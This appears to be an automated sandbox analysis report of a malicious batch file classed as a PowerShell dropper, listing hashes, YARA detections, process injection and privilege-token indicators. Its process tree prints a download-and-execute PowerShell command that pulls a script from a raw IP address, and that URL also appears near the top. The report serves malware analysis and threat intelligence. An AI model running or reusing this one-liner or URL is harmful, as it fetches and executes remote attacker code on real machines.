085cf732d404c2443d63dd7fef9f872f0c4dc0ef5f0c048bd308a20aff169bd8

Resubmissions

04-08-2020 12:19

02-08-2020 19:10

Target

21b6d26f5616dbe4b9f07bd5660bb62d.bat
Size

215B
MD5

d0dba6d8db0dbf8637507b05349fd02f
SHA1

e3795cff8728780bd8d72ae5f7e317ee93075e93
SHA256

085cf732d404c2443d63dd7fef9f872f0c4dc0ef5f0c048bd308a20aff169bd8
SHA512

de33e169bfaf0170acb3053f62d40e115e162671c77555e7c0bae5e12579f7900f1172296279167f120a3821566ee8b111e5e2e366711bf0d5fde9e5e3340b7f

Score

10^/10

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/21b6d26f5616dbe4b9f07bd5660bb62d

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

WerFault.exe

ServiceHost packer 5 IoCs

Detects ServiceHost packer used for .NET malware

Processes:

resource	yara_rule
behavioral2/memory/4044-3-0x0000000000000000-mapping.dmp	servicehost
behavioral2/memory/4044-2-0x0000000000000000-mapping.dmp	servicehost
behavioral2/memory/4044-4-0x0000000000000000-mapping.dmp	servicehost
behavioral2/memory/4044-5-0x0000000000000000-mapping.dmp	servicehost
behavioral2/memory/4044-6-0x0000000000000000-mapping.dmp	servicehost

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 3676 wrote to memory of 4044	3676	cmd.exe	powershell.exe
PID 3676 wrote to memory of 4044	3676	cmd.exe	powershell.exe
PID 3676 wrote to memory of 4044	3676	cmd.exe	powershell.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3844 4044 WerFault.exe powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

WerFault.exe

description pid process

Token: SeRestorePrivilege 3844 WerFault.exe
Token: SeBackupPrivilege 3844 WerFault.exe
Token: SeDebugPrivilege 3844 WerFault.exe

pid	pid_target	process	target process
3844	4044	WerFault.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\21b6d26f5616dbe4b9f07bd5660bb62d.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3676

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/21b6d26f5616dbe4b9f07bd5660bb62d');Invoke-NWPLCMRG;Start-Sleep -s 10000"
2⤵
PID:4044

memory/3844-1-0x0000000004AD0000-0x0000000004AD1000-memory.dmp

Filesize
4KB

Download
memory/3844-7-0x0000000005100000-0x0000000005101000-memory.dmp

Filesize
4KB

Download
memory/4044-0-0x0000000000000000-mapping.dmp

Download
memory/4044-3-0x0000000000000000-mapping.dmp

Download
memory/4044-2-0x0000000000000000-mapping.dmp

Download
memory/4044-4-0x0000000000000000-mapping.dmp

Download
memory/4044-5-0x0000000000000000-mapping.dmp

Download
memory/4044-6-0x0000000000000000-mapping.dmp

Download